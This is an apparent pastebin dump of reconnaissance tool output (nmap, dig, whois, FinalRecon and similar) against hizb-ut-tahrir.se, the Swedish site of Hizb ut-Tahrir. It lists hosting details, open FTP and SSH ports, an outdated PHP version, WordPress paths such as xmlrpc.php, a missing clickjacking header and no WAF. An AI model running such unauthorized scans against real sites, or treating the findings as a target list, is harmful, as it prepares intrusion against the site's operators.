· 6 years ago · Jan 17, 2020, 01:30 AM
1#######################################################################################################################################
2=======================================================================================================================================
3Hostname hizb-ut-tahrir.se ISP Zitcom A/S
4Continent Europe Flag
5DK
6Country Denmark Country Code DK
7Region South Denmark Local time 17 Jan 2020 01:12 CET
8City Langeskov Postal Code 5550
9IP Address 93.191.156.197 Latitude 55.357
10 Longitude 10.585
11=======================================================================================================================================
12######################################################################################################################################
13> hizb-ut-tahrir.se
14Server: 185.93.180.131
15Address: 185.93.180.131#53
16
17Non-authoritative answer:
18Name: hizb-ut-tahrir.se
19Address: 93.191.156.197
20>
21#######################################################################################################################################
22state: active
23domain: hizb-ut-tahrir.se
24holder: (not shown)
25admin-c: (not shown)
26tech-c: SURSUR0903-00003
27billing-c: SURSUR0903-00001
28created: 2012-10-12
29modified: 2019-10-07
30expires: 2020-10-12
31nserver: ns1.unoeuro.com
32nserver: ns2.unoeuro.com
33nserver: ns3.unoeuro.com
34nserver: ns4.unoeuro.com
35dnssec: unsigned delegation
36registry-lock: unlocked
37status: ok
38registrar: Surftown Europe
39#######################################################################################################################################
40[+] Target : hizb-ut-tahrir.se
41
42[+] IP Address : 93.191.156.197
43
44[+] Headers :
45
46[+] Date : Fri, 17 Jan 2020 00:29:36 GMT
47[+] Server : Apache
48[+] Content-Length : 221
49[+] Keep-Alive : timeout=20, max=10000
50[+] Connection : Keep-Alive
51[+] Content-Type : text/html; charset=iso-8859-1
52
53[+] SSL Certificate Information :
54
55[+] commonName : hizb-ut-tahrir.se
56[+] countryName : US
57[+] organizationName : Let's Encrypt
58[+] commonName : Let's Encrypt Authority X3
59[+] Version : 3
60[+] Serial Number : 0428545C12839233317EF4EDE728037CBFE5
61[+] Not Before : Dec 4 04:01:19 2019 GMT
62[+] Not After : Mar 3 04:01:19 2020 GMT
63[+] OCSP : ('http://ocsp.int-x3.letsencrypt.org',)
64[+] subject Alt Name : (('DNS', 'hizb-ut-tahrir.se'), ('DNS', 'www.hizb-ut-tahrir.se'))
65[+] CA Issuers : ('http://cert.int-x3.letsencrypt.org/',)
66
67[+] Whois Lookup :
68
69[+] NIR : None
70[+] ASN Registry : ripencc
71[+] ASN : 48854
72[+] ASN CIDR : 93.191.156.0/24
73[+] ASN Country Code : DK
74[+] ASN Date : 2010-09-02
75[+] ASN Description : ZITCOM, DK
76[+] cidr : 93.191.156.0/24
77[+] name : ACL-2342
78[+] handle : ZIN4-RIPE
79[+] range : 93.191.156.0 - 93.191.156.255
80[+] description : ZITCOM A/S
81[+] country : DK
82[+] state : None
83[+] city : None
84[+] address : Hjvangen 4
858660
86Skanderborg
87DENMARK
88[+] postal_code : None
89[+] emails : ['abuse@zitcom.dk']
90[+] created : 2018-01-03T12:40:00Z
91[+] updated : 2018-01-03T12:41:38Z
92
93[+] Crawling Target...
94
95[+] Looking for robots.txt........[ Found ]
96[+] Extracting robots Links.......[ 4 ]
97[+] Looking for sitemap.xml.......[ Not Found ]
98[+] Extracting CSS Links..........[ 6 ]
99[+] Extracting Javascript Links...[ 18 ]
100[+] Extracting Internal Links.....[ 27 ]
101[+] Extracting External Links.....[ 16 ]
102[+] Extracting Images.............[ 17 ]
103
104[+] Total Links Extracted : 88
105
106[+] Dumping Links in /opt/FinalRecon/dumps/hizb-ut-tahrir.se.dump
107[+] Completed!
108######################################################################################################################################
109[i] Scanning Site: http://hizb-ut-tahrir.se
110
111
112
113B A S I C I N F O
114====================
115
116
117[+] Site Title:
118[+] IP address: 93.191.156.197
119[+] Web Server: Apache
120[+] CMS: Could Not Detect
121[+] Cloudflare: Not Detected
122[+] Robots File: Could NOT Find robots.txt!
123
124
125
126
127W H O I S L O O K U P
128========================
129
130 # Copyright (c) 1997- The Swedish Internet Foundation.
131# All rights reserved.
132# The information obtained through searches, or otherwise, is protected
133# by the Swedish Copyright Act (1960:729) and international conventions.
134# It is also subject to database protection according to the Swedish
135# Copyright Act.
136# Any use of this material to target advertising or
137# similar activities is forbidden and will be prosecuted.
138# If any of the information below is transferred to a third
139# party, it must be done in its entirety. This server must
140# not be used as a backend for a search engine.
141# Result of search for registered domain names under
142# the .se top level domain.
143# This whois printout is printed with UTF-8 encoding.
144#
145state: active
146domain: hizb-ut-tahrir.se
147holder: (not shown)
148admin-c: (not shown)
149tech-c: SURSUR0903-00003
150billing-c: SURSUR0903-00001
151created: 2012-10-12
152modified: 2019-10-07
153expires: 2020-10-12
154nserver: ns1.unoeuro.com
155nserver: ns2.unoeuro.com
156nserver: ns3.unoeuro.com
157nserver: ns4.unoeuro.com
158dnssec: unsigned delegation
159registry-lock: unlocked
160status: ok
161registrar: Surftown Europe
162
163
164
165
166G E O I P L O O K U P
167=========================
168
169[i] IP Address: 93.191.156.197
170[i] Country: Denmark
171[i] State: South Denmark
172[i] City: Aabenraa
173[i] Latitude: 55.0443
174[i] Longitude: 9.4174
175
176
177
178
179H T T P H E A D E R S
180=======================
181
182
183[i] HTTP/1.1 406 Not Acceptable
184[i] Date: Fri, 17 Jan 2020 00:30:00 GMT
185[i] Server: Apache
186[i] Content-Length: 221
187[i] Connection: close
188[i] Content-Type: text/html; charset=iso-8859-1
189
190
191
192
193D N S L O O K U P
194===================
195
196hizb-ut-tahrir.se. 3599 IN A 93.191.156.197
197hizb-ut-tahrir.se. 3599 IN MX 10 mx.unoeuro.com.
198hizb-ut-tahrir.se. 3599 IN NS ns1.unoeuro.com.
199hizb-ut-tahrir.se. 3599 IN NS ns2.unoeuro.com.
200hizb-ut-tahrir.se. 3599 IN NS ns3.unoeuro.com.
201hizb-ut-tahrir.se. 3599 IN NS ns4.unoeuro.com.
202hizb-ut-tahrir.se. 3599 IN TXT "v=spf1 include:spf.unoeuro.com ?all"
203hizb-ut-tahrir.se. 14399 IN SOA ns1.unoeuro.com. hostmaster.unoeuro.com. 2019060300 14400 3600 1209600 3600
204
205
206
207
208S U B N E T C A L C U L A T I O N
209====================================
210
211Address = 93.191.156.197
212Network = 93.191.156.197 / 32
213Netmask = 255.255.255.255
214Broadcast = not needed on Point-to-Point links
215Wildcard Mask = 0.0.0.0
216Hosts Bits = 0
217Max. Hosts = 1 (2^0 - 0)
218Host Range = { 93.191.156.197 - 93.191.156.197 }
219
220
221
222N M A P P O R T S C A N
223============================
224
225Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-17 00:30 UTC
226Nmap scan report for hizb-ut-tahrir.se (93.191.156.197)
227Host is up (0.096s latency).
228rDNS record for 93.191.156.197: linux307.unoeuro.com
229
230PORT STATE SERVICE
23121/tcp open ftp
23222/tcp open ssh
23323/tcp filtered telnet
23480/tcp open http
235110/tcp filtered pop3
236143/tcp filtered imap
237443/tcp open https
2383389/tcp filtered ms-wbt-server
239
240Nmap done: 1 IP address (1 host up) scanned in 2.06 seconds
241
242
243
244S U B - D O M A I N F I N D E R
245==================================
246
247
248[i] Total Subdomains Found : 1
249
250[+] Subdomain: www.hizb-ut-tahrir.se
251[-] IP: 93.191.156.197
252#######################################################################################################################################
253[+] Starting At 2020-01-16 19:30:19.574189
254[+] Collecting Information On: http://hizb-ut-tahrir.se/
255[#] Status: 200
256--------------------------------------------------
257[#] Web Server Detected: Apache
258[#] X-Powered-By: PHP/5.6.40
259[!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
260- Date: Fri, 17 Jan 2020 00:30:15 GMT
261- Server: Apache
262- X-Powered-By: PHP/5.6.40
263- Link: <https://hizb-ut-tahrir.se/wp-json/>; rel="https://api.w.org/"
264- Upgrade: h2
265- Connection: Upgrade, Keep-Alive
266- Vary: Accept-Encoding
267- Content-Encoding: gzip
268- Content-Length: 10909
269- Keep-Alive: timeout=20, max=10000
270- Content-Type: text/html; charset=UTF-8
271--------------------------------------------------
272[#] Finding Location..!
273[#] status: success
274[#] country: Denmark
275[#] countryCode: DK
276[#] region: 82
277[#] regionName: Central Jutland
278[#] city: Skanderborg
279[#] zip: 8660
280[#] lat: 56.0482
281[#] lon: 9.94533
282[#] timezone: Europe/Copenhagen
283[#] isp: Zitcom A/S
284[#] org: Zitcom
285[#] as: AS48854 Zitcom A/S
286[#] query: 93.191.156.197
287--------------------------------------------------
288[x] Didn't Detect WAF Presence on: http://hizb-ut-tahrir.se/
289--------------------------------------------------
290[#] Starting Reverse DNS
291[-] Failed ! Fail
292--------------------------------------------------
293[!] Scanning Open Port
294[#] 21/tcp open ftp
295[#] 22/tcp open ssh
296[#] 80/tcp open http
297[#] 443/tcp open https
298--------------------------------------------------
299[+] Getting SSL Info
300{'OCSP': ('http://ocsp.int-x3.letsencrypt.org',),
301 'caIssuers': ('http://cert.int-x3.letsencrypt.org/',),
302 'issuer': ((('countryName', 'US'),),
303 (('organizationName', "Let's Encrypt"),),
304 (('commonName', "Let's Encrypt Authority X3"),)),
305 'notAfter': 'Mar 3 04:01:19 2020 GMT',
306 'notBefore': 'Dec 4 04:01:19 2019 GMT',
307 'serialNumber': '0428545C12839233317EF4EDE728037CBFE5',
308 'subject': ((('commonName', 'hizb-ut-tahrir.se'),),),
309 'subjectAltName': (('DNS', 'hizb-ut-tahrir.se'),
310 ('DNS', 'www.hizb-ut-tahrir.se')),
311 'version': 3}
312-----BEGIN CERTIFICATE-----
313MIIGczCCBVugAwIBAgIRAP1upSm9xquZiAc3qTtjSfwwDQYJKoZIhvcNAQELBQAw
314gY8xCzAJBgNVBAYTAkdCMRswGQYDVQQIExJHcmVhdGVyIE1hbmNoZXN0ZXIxEDAO
315BgNVBAcTB1NhbGZvcmQxGDAWBgNVBAoTD1NlY3RpZ28gTGltaXRlZDE3MDUGA1UE
316AxMuU2VjdGlnbyBSU0EgRG9tYWluIFZhbGlkYXRpb24gU2VjdXJlIFNlcnZlciBD
317QTAeFw0xOTAyMDYwMDAwMDBaFw0yMTAyMDUyMzU5NTlaMFoxITAfBgNVBAsTGERv
318bWFpbiBDb250cm9sIFZhbGlkYXRlZDEdMBsGA1UECxMUUG9zaXRpdmVTU0wgV2ls
319ZGNhcmQxFjAUBgNVBAMMDSoudW5vZXVyby5jb20wggEiMA0GCSqGSIb3DQEBAQUA
320A4IBDwAwggEKAoIBAQDvDyFy10Ha42WEPFq+tDefzLNQbqxuP6rm8MSTjDLsyHaK
321FIc5mhJJB8vlvBNcLDMSKYhyrENHeYX5V25nIZiqmb2rKc6P2RwLvUhIN9+mbddv
322C8GM+XDcZJ+KiNaIuFcEepVYzCiWJl5EU41bLihm4kiOPE2+ZTffWNFCROBMuiMi
323VBGXKGzxsy9imiojwF9kISbxvwEDK5oIFSyhf3gw2ixTDbgyRRqsq6CdFRWAU2TZ
324sUGvd+LUtEhoJLC0758ECWWesdfCg3239P2vy5wSEALiQhXbEdq0CAicCAwLtRIA
325ufWSEQ7+kfE6UyR0oAZKZ4UNSMRqiEFBxUW6lmgVAgMBAAGjggL8MIIC+DAfBgNV
326HSMEGDAWgBSNjF7EVK2K4Xfpm/mbBeG4AY1h4TAdBgNVHQ4EFgQUmLvFjWh5zRQw
327KRprMUaQAPFeNL4wDgYDVR0PAQH/BAQDAgWgMAwGA1UdEwEB/wQCMAAwHQYDVR0l
328BBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMEkGA1UdIARCMEAwNAYLKwYBBAGyMQEC
329AgcwJTAjBggrBgEFBQcCARYXaHR0cHM6Ly9zZWN0aWdvLmNvbS9DUFMwCAYGZ4EM
330AQIBMIGEBggrBgEFBQcBAQR4MHYwTwYIKwYBBQUHMAKGQ2h0dHA6Ly9jcnQuc2Vj
331dGlnby5jb20vU2VjdGlnb1JTQURvbWFpblZhbGlkYXRpb25TZWN1cmVTZXJ2ZXJD
332QS5jcnQwIwYIKwYBBQUHMAGGF2h0dHA6Ly9vY3NwLnNlY3RpZ28uY29tMCUGA1Ud
333EQQeMByCDSoudW5vZXVyby5jb22CC3Vub2V1cm8uY29tMIIBfgYKKwYBBAHWeQIE
334AgSCAW4EggFqAWgAdgC72d+8H4pxtZOUI5eqkntHOFeVCqtS6BqQlmQ2jh7RhQAA
335AWjDGiX1AAAEAwBHMEUCIQC492sIY25gSi6qluu55G6WzlMrDFB8m9ZnJK+BlhzQ
336pwIgPY6IZGPA/gxHmMFLZpkGLtLnAzK2KW8/nz5dSmyRcMQAdwBElGUusO7Or8RA
337B9io/ijA2uaCvtjLMbU/0zOWtbaBqAAAAWjDGiZBAAAEAwBIMEYCIQDxYO4jgLce
338RDyA+U8q+qRRTMqanUzuphte+hOVy7NXBAIhAOiKZFhDFsNKRvfsXb5Q132VPi25
3390Fe3p/OvAMbbcfZkAHUAXNxDkv7mq0VEsV6a1FbmEDf71fpH3KFzlLJe5vbHDsoA
340AAFowxomQAAABAMARjBEAiAy8KyBocdJ8TwQeyXViKOkrw1jsQXs6+9/Cd2nYFLk
341NQIgfApdDDr1ADl2sTBQYFicRe3ks8cZWhKC6ACI/wgJ8JEwDQYJKoZIhvcNAQEL
342BQADggEBAHT9p1oVaU00HDXcpoeInwaaW4VOXJ0owpllHWiTqBQDnLBwGx1d3qID
343Gp2+EUXt26INVp9/m+BDUK/Fby9za3LE9paKFe9DnjmU7QCMIl5HpDOgm/jw3zuu
344MBKaHO8IqVOwek1qSMyM01ZJqB9QbzB7hIIGDEhJe1hrj8wMVoqayK87O/ULAnMu
345ogjBpqGh7uOsvXD0YCkVlNkX/YFUx4o2lvsQvK88XqgBu1dADHP+54lDGB09Q7T9
346n9nftE5q8n4yqqtldGQmkdgkG4HJaIbhRL1hjMOTx9k3ZXaEMHSLK5ncnKEXILxH
3477KTs/RI4V0iTu9/lzcQ730zMyW1azWc=
348-----END CERTIFICATE-----
349
350--------------------------------------------------
351[+] Collecting Information Disclosure!
352[#] Detecting sitemap.xml file
353[-] sitemap.xml file not Found!?
354[#] Detecting robots.txt file
355[!] robots.txt File Found: http://hizb-ut-tahrir.se//robots.txt
356[#] Detecting GNU Mailman
357[-] GNU Mailman App Not Detected!?
358--------------------------------------------------
359[+] Crawling Url Parameter On: http://hizb-ut-tahrir.se/
360--------------------------------------------------
361[#] Searching Html Form !
362[+] Html Form Discovered
363[#] action: https://hizb-ut-tahrir.se/
364[#] class: ['flymag-search-form']
365[#] id: None
366[#] method: get
367--------------------------------------------------
368[!] Found 1 dom parameter
369[#] http://hizb-ut-tahrir.se//#content
370--------------------------------------------------
371[!] 1 Internal Dynamic Parameter Discovered
372[+] https://hizb-ut-tahrir.se/xmlrpc.php?rsd
373--------------------------------------------------
374[-] No external Dynamic Paramter Found!?
375--------------------------------------------------
376[!] 101 Internal links Discovered
377[+] http://hizb-ut-tahrir.se/xmlrpc.php
378[+] https://hizb-ut-tahrir.se/feed/
379[+] https://hizb-ut-tahrir.se/comments/feed/
380[+] http://hizb-ut-tahrir.se/wp-includes/wlwmanifest.xml
381[+] https://hizb-ut-tahrir.se/wp-content/uploads/2018/03/cropped-IKON-32x32.jpg
382[+] https://hizb-ut-tahrir.se/wp-content/uploads/2018/03/cropped-IKON-192x192.jpg
383[+] https://hizb-ut-tahrir.se/wp-content/uploads/2018/03/cropped-IKON-180x180.jpg
384[+] https://hizb-ut-tahrir.se/den-islamiska-identiteten-ar-i-fara-muslimerna-maste-agera-nu/
385[+] https://hizb-ut-tahrir.se/pressmeddelande-imam-skandalen-i-sverige-en-existentiell-kris-for-demokratin/
386[+] https://hizb-ut-tahrir.se/koranen-branns-med-den-danska-regeringens-valsignelse/
387[+] https://hizb-ut-tahrir.se/massakern-i-nya-zeeland-de-vasterlandska-regeringarna-och-medierna-bar-ansvaret-for-hatet/
388[+] https://hizb-ut-tahrir.se/pressmeddelande-hizb-ut-tahrirs-kampanj-i-sverige-anvand-din-rost-men-inte-till-valet/
389[+] https://hizb-ut-tahrir.se/de-svenska-myndigheternas-fortvivlade-forsok-att-kvava-hizb-ut-tahrirs-kall/
390[+] https://hizb-ut-tahrir.se/
391[+] http://hizb-ut-tahrir.se
392[+] https://hizb-ut-tahrir.se/artiklar/
393[+] https://hizb-ut-tahrir.se/broschyrer/
394[+] https://hizb-ut-tahrir.se/bocker/
395[+] https://hizb-ut-tahrir.se/category/svenska-bocker/
396[+] https://hizb-ut-tahrir.se/category/engelska-bocker/
397[+] https://hizb-ut-tahrir.se/videos/
398[+] https://hizb-ut-tahrir.se/hizb-ut-tahrir/
399[+] https://hizb-ut-tahrir.se/faq/
400[+] https://hizb-ut-tahrir.se/den-islamiska-identiteten-ar-i-fara-muslimerna-maste-agera-nu/
401[+] https://hizb-ut-tahrir.se/den-islamiska-identiteten-ar-i-fara-muslimerna-maste-agera-nu/
402[+] https://hizb-ut-tahrir.se/den-islamiska-identiteten-ar-i-fara-muslimerna-maste-agera-nu/
403[+] https://hizb-ut-tahrir.se/pressmeddelande-imam-skandalen-i-sverige-en-existentiell-kris-for-demokratin/
404[+] https://hizb-ut-tahrir.se/pressmeddelande-imam-skandalen-i-sverige-en-existentiell-kris-for-demokratin/
405[+] https://hizb-ut-tahrir.se/pressmeddelande-imam-skandalen-i-sverige-en-existentiell-kris-for-demokratin/
406[+] https://hizb-ut-tahrir.se/koranen-branns-med-den-danska-regeringens-valsignelse/
407[+] https://hizb-ut-tahrir.se/koranen-branns-med-den-danska-regeringens-valsignelse/
408[+] https://hizb-ut-tahrir.se/koranen-branns-med-den-danska-regeringens-valsignelse/
409[+] https://hizb-ut-tahrir.se/massakern-i-nya-zeeland-de-vasterlandska-regeringarna-och-medierna-bar-ansvaret-for-hatet/
410[+] https://hizb-ut-tahrir.se/massakern-i-nya-zeeland-de-vasterlandska-regeringarna-och-medierna-bar-ansvaret-for-hatet/
411[+] https://hizb-ut-tahrir.se/massakern-i-nya-zeeland-de-vasterlandska-regeringarna-och-medierna-bar-ansvaret-for-hatet/
412[+] https://hizb-ut-tahrir.se/pressmeddelande-hizb-ut-tahrirs-kampanj-i-sverige-anvand-din-rost-men-inte-till-valet/
413[+] https://hizb-ut-tahrir.se/pressmeddelande-hizb-ut-tahrirs-kampanj-i-sverige-anvand-din-rost-men-inte-till-valet/
414[+] https://hizb-ut-tahrir.se/pressmeddelande-hizb-ut-tahrirs-kampanj-i-sverige-anvand-din-rost-men-inte-till-valet/
415[+] https://hizb-ut-tahrir.se/de-svenska-myndigheternas-fortvivlade-forsok-att-kvava-hizb-ut-tahrirs-kall/
416[+] https://hizb-ut-tahrir.se/de-svenska-myndigheternas-fortvivlade-forsok-att-kvava-hizb-ut-tahrirs-kall/
417[+] https://hizb-ut-tahrir.se/de-svenska-myndigheternas-fortvivlade-forsok-att-kvava-hizb-ut-tahrirs-kall/
418[+] https://hizb-ut-tahrir.se/den-islamiska-identiteten-ar-i-fara-muslimerna-maste-agera-nu/
419[+] https://hizb-ut-tahrir.se/den-islamiska-identiteten-ar-i-fara-muslimerna-maste-agera-nu/
420[+] https://hizb-ut-tahrir.se/den-islamiska-identiteten-ar-i-fara-muslimerna-maste-agera-nu/
421[+] https://hizb-ut-tahrir.se/author/admin/
422[+] https://hizb-ut-tahrir.se/category/artiklar/
423[+] https://hizb-ut-tahrir.se/pressmeddelande-imam-skandalen-i-sverige-en-existentiell-kris-for-demokratin/
424[+] https://hizb-ut-tahrir.se/pressmeddelande-imam-skandalen-i-sverige-en-existentiell-kris-for-demokratin/
425[+] https://hizb-ut-tahrir.se/pressmeddelande-imam-skandalen-i-sverige-en-existentiell-kris-for-demokratin/
426[+] https://hizb-ut-tahrir.se/author/admin/
427[+] https://hizb-ut-tahrir.se/category/artiklar/
428[+] https://hizb-ut-tahrir.se/koranen-branns-med-den-danska-regeringens-valsignelse/
429[+] https://hizb-ut-tahrir.se/koranen-branns-med-den-danska-regeringens-valsignelse/
430[+] https://hizb-ut-tahrir.se/koranen-branns-med-den-danska-regeringens-valsignelse/
431[+] https://hizb-ut-tahrir.se/author/admin/
432[+] https://hizb-ut-tahrir.se/category/artiklar/
433[+] https://hizb-ut-tahrir.se/massakern-i-nya-zeeland-de-vasterlandska-regeringarna-och-medierna-bar-ansvaret-for-hatet/
434[+] https://hizb-ut-tahrir.se/massakern-i-nya-zeeland-de-vasterlandska-regeringarna-och-medierna-bar-ansvaret-for-hatet/
435[+] https://hizb-ut-tahrir.se/massakern-i-nya-zeeland-de-vasterlandska-regeringarna-och-medierna-bar-ansvaret-for-hatet/
436[+] https://hizb-ut-tahrir.se/author/admin/
437[+] https://hizb-ut-tahrir.se/category/artiklar/
438[+] https://hizb-ut-tahrir.se/pressmeddelande-hizb-ut-tahrirs-kampanj-i-sverige-anvand-din-rost-men-inte-till-valet/
439[+] https://hizb-ut-tahrir.se/pressmeddelande-hizb-ut-tahrirs-kampanj-i-sverige-anvand-din-rost-men-inte-till-valet/
440[+] https://hizb-ut-tahrir.se/pressmeddelande-hizb-ut-tahrirs-kampanj-i-sverige-anvand-din-rost-men-inte-till-valet/
441[+] https://hizb-ut-tahrir.se/author/admin/
442[+] https://hizb-ut-tahrir.se/category/artiklar/
443[+] https://hizb-ut-tahrir.se/de-svenska-myndigheternas-fortvivlade-forsok-att-kvava-hizb-ut-tahrirs-kall/
444[+] https://hizb-ut-tahrir.se/de-svenska-myndigheternas-fortvivlade-forsok-att-kvava-hizb-ut-tahrirs-kall/
445[+] https://hizb-ut-tahrir.se/de-svenska-myndigheternas-fortvivlade-forsok-att-kvava-hizb-ut-tahrirs-kall/
446[+] https://hizb-ut-tahrir.se/author/admin/
447[+] https://hizb-ut-tahrir.se/category/artiklar/
448[+] https://hizb-ut-tahrir.se/900/
449[+] https://hizb-ut-tahrir.se/900/
450[+] https://hizb-ut-tahrir.se/900/
451[+] https://hizb-ut-tahrir.se/author/admin/
452[+] https://hizb-ut-tahrir.se/category/artiklar/
453[+] https://hizb-ut-tahrir.se/annu-ett-forsok-att-fa-muslimerna-att-avsaga-sig-sin-islamiska-identitet/
454[+] https://hizb-ut-tahrir.se/annu-ett-forsok-att-fa-muslimerna-att-avsaga-sig-sin-islamiska-identitet/
455[+] https://hizb-ut-tahrir.se/annu-ett-forsok-att-fa-muslimerna-att-avsaga-sig-sin-islamiska-identitet/
456[+] https://hizb-ut-tahrir.se/author/admin/
457[+] https://hizb-ut-tahrir.se/category/artiklar/
458[+] https://hizb-ut-tahrir.se/med-ramadans-ankomst-kommer-islamfientlighetens-test-pa-muslimernas-iman/
459[+] https://hizb-ut-tahrir.se/med-ramadans-ankomst-kommer-islamfientlighetens-test-pa-muslimernas-iman/
460[+] https://hizb-ut-tahrir.se/med-ramadans-ankomst-kommer-islamfientlighetens-test-pa-muslimernas-iman/
461[+] https://hizb-ut-tahrir.se/author/admin/
462[+] https://hizb-ut-tahrir.se/category/artiklar/
463[+] https://hizb-ut-tahrir.se/882/
464[+] https://hizb-ut-tahrir.se/882/
465[+] https://hizb-ut-tahrir.se/882/
466[+] https://hizb-ut-tahrir.se/author/admin/
467[+] https://hizb-ut-tahrir.se/category/artiklar/
468[+] https://hizb-ut-tahrir.se/page/2/
469[+] https://hizb-ut-tahrir.se/den-islamiska-identiteten-ar-i-fara-muslimerna-maste-agera-nu/
470[+] https://hizb-ut-tahrir.se/pressmeddelande-imam-skandalen-i-sverige-en-existentiell-kris-for-demokratin/
471[+] https://hizb-ut-tahrir.se/koranen-branns-med-den-danska-regeringens-valsignelse/
472[+] https://hizb-ut-tahrir.se/massakern-i-nya-zeeland-de-vasterlandska-regeringarna-och-medierna-bar-ansvaret-for-hatet/
473[+] https://hizb-ut-tahrir.se/pressmeddelande-hizb-ut-tahrirs-kampanj-i-sverige-anvand-din-rost-men-inte-till-valet/
474[+] http://hizb-ut-tahrir.se//mailto:info@hizb-ut-tahrir.se
475[+] https://hizb-ut-tahrir.se/intellektuella-introduktion-till-islam/
476[+] https://hizb-ut-tahrir.se/profeten-muhammad-fordomar-och-fakta/
477[+] https://hizb-ut-tahrir.se/158/
478--------------------------------------------------
479[!] 17 External links Discovered
480[#] http://gmpg.org/xfn/11
481[#] https://www.facebook.com/Hizb-ut-Tahrir-Sverige-2338466706174842/
482[#] http://www.hizb-ut-tahrir.org/
483[#] http://www.pal-tahrir.info/
484[#] https://mykhilafah.com/
485[#] http://www.hizb-ut-tahrir.info/
486[#] https://hizb-russia.info/
487[#] http://www.hizb-ut-tahrir-almaghreb.info/
488[#] http://www.hizb-australia.org/
489[#] http://hizb-afghanistan.org/
490[#] https://hizb.org.ua/ru/
491[#] http://www.hizb.org.uk/
492[#] http://www.hizb-ut-tahrir.nl/
493[#] http://hizb-pakistan.org/
494[#] http://www.hizb-ut-tahrir.dk/
495[#] https://hizb-america.org/
496[#] http://tahrir-syria.info/
497--------------------------------------------------
498[#] Mapping Subdomain..
499[!] Found 2 Subdomain
500- hizb-ut-tahrir.se
501- www.hizb-ut-tahrir.se
502--------------------------------------------------
503[!] Done At 2020-01-16 19:31:02.372126
504######################################################################################################################################
505Trying "hizb-ut-tahrir.se"
506Trying "hizb-ut-tahrir.se"
507;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12426
508;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 0, ADDITIONAL: 6
509
510;; QUESTION SECTION:
511;hizb-ut-tahrir.se. IN ANY
512
513;; ANSWER SECTION:
514hizb-ut-tahrir.se. 14400 IN SOA ns1.unoeuro.com. hostmaster.unoeuro.com. 2019060300 14400 3600 1209600 3600
515hizb-ut-tahrir.se. 3600 IN TXT "v=spf1 include:spf.unoeuro.com ?all"
516hizb-ut-tahrir.se. 3600 IN MX 10 mx.unoeuro.com.
517hizb-ut-tahrir.se. 3600 IN A 93.191.156.197
518hizb-ut-tahrir.se. 7200 IN RRSIG NSEC 8 2 7200 20200129111026 20200115081042 40264 se. x50SzwKp67I1CaGsEkjP896WJMbzQATn2IqH18hqhkJ6zbJ7BGM+Hane Nc29U9EQgsOzQjqH0RzDFwrpNB7bdWc5K2KXmemnYYldKc79yGZmLAjA rEgOA2md+4mizNaXYadx71HebCHjNosG2A6iEg98mn532PRRbwIJmv8+ 93htlDum9XfnMg0nKy+D4X9s5WvALLrNe4W4kUi30H5ZrsUAApjBMYDh D8UjJ0pCeSK2mhGk/sPtlaFRo9jPC3LEztRs3XkmrKYWC0wHUS/h5WeY bgdrSPjAX5X55U8T8xF13MF8QGbFiQ51JMIhY/DpungOMBy0TD0wGWWn 3hg10Q==
519hizb-ut-tahrir.se. 7200 IN NSEC hizentra.se. NS RRSIG NSEC
520hizb-ut-tahrir.se. 3600 IN NS ns1.unoeuro.com.
521hizb-ut-tahrir.se. 3600 IN NS ns2.unoeuro.com.
522hizb-ut-tahrir.se. 3600 IN NS ns3.unoeuro.com.
523hizb-ut-tahrir.se. 3600 IN NS ns4.unoeuro.com.
524
525;; ADDITIONAL SECTION:
526ns1.unoeuro.com. 31062 IN A 46.36.215.2
527ns2.unoeuro.com. 31062 IN A 185.25.141.15
528ns3.unoeuro.com. 31062 IN A 83.217.78.186
529ns4.unoeuro.com. 31062 IN A 85.159.211.233
530ns3.unoeuro.com. 31062 IN AAAA 2a00:1c98:10:26::10
531ns4.unoeuro.com. 31062 IN AAAA 2a01:7e00::f03c:91ff:fe50:2326
532
533Received 691 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 47 ms
534#######################################################################################################################################
535; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> +trace hizb-ut-tahrir.se any
536;; global options: +cmd
537. 86307 IN NS a.root-servers.net.
538. 86307 IN NS m.root-servers.net.
539. 86307 IN NS i.root-servers.net.
540. 86307 IN NS b.root-servers.net.
541. 86307 IN NS j.root-servers.net.
542. 86307 IN NS l.root-servers.net.
543. 86307 IN NS h.root-servers.net.
544. 86307 IN NS e.root-servers.net.
545. 86307 IN NS f.root-servers.net.
546. 86307 IN NS g.root-servers.net.
547. 86307 IN NS k.root-servers.net.
548. 86307 IN NS d.root-servers.net.
549. 86307 IN NS c.root-servers.net.
550. 86307 IN RRSIG NS 8 0 518400 20200129220000 20200116210000 33853 . 1vCC1jMvN09c/Zmc3AeY6amgwDOwSdCvPbj4bbcctvqPrLVk6Gg/0n8m KEs4BrJe3bQqMvZPNTm9oyk3lRVCWSnBWQMNApfRkGixIWu6tld0AUfQ ZJYoW0x8VVcZrgeypfRSxiH5o0GnsnvOKhoinigCApFukK1M4lIR/Rzj CmK4iYpZHMhs2iXhrDqMYuPTLeRP7XXg5KOSYBS0JMfwbmVowvI3/Yno GjMCt9J/0gMNH3OThhorzyE1srY5bueqS/AnbDtz6MskregHAx5zQbx2 qgg+0Cs32FsIF3SvHM9M07T8ksfEoAnJg8AfrMFctWGdhYgNDC1CbUf1 zAR6pw==
551;; Received 525 bytes from 185.93.180.131#53(185.93.180.131) in 241 ms
552
553se. 172800 IN NS a.ns.se.
554se. 172800 IN NS b.ns.se.
555se. 172800 IN NS c.ns.se.
556se. 172800 IN NS x.ns.se.
557se. 172800 IN NS z.ns.se.
558se. 172800 IN NS f.ns.se.
559se. 172800 IN NS g.ns.se.
560se. 172800 IN NS i.ns.se.
561se. 172800 IN NS y.ns.se.
562se. 86400 IN DS 59407 8 2 67A8E06FCEFDD9397F77F26C41ADE4EC142F299BCFA1827F0EF8FD87 F2F63022
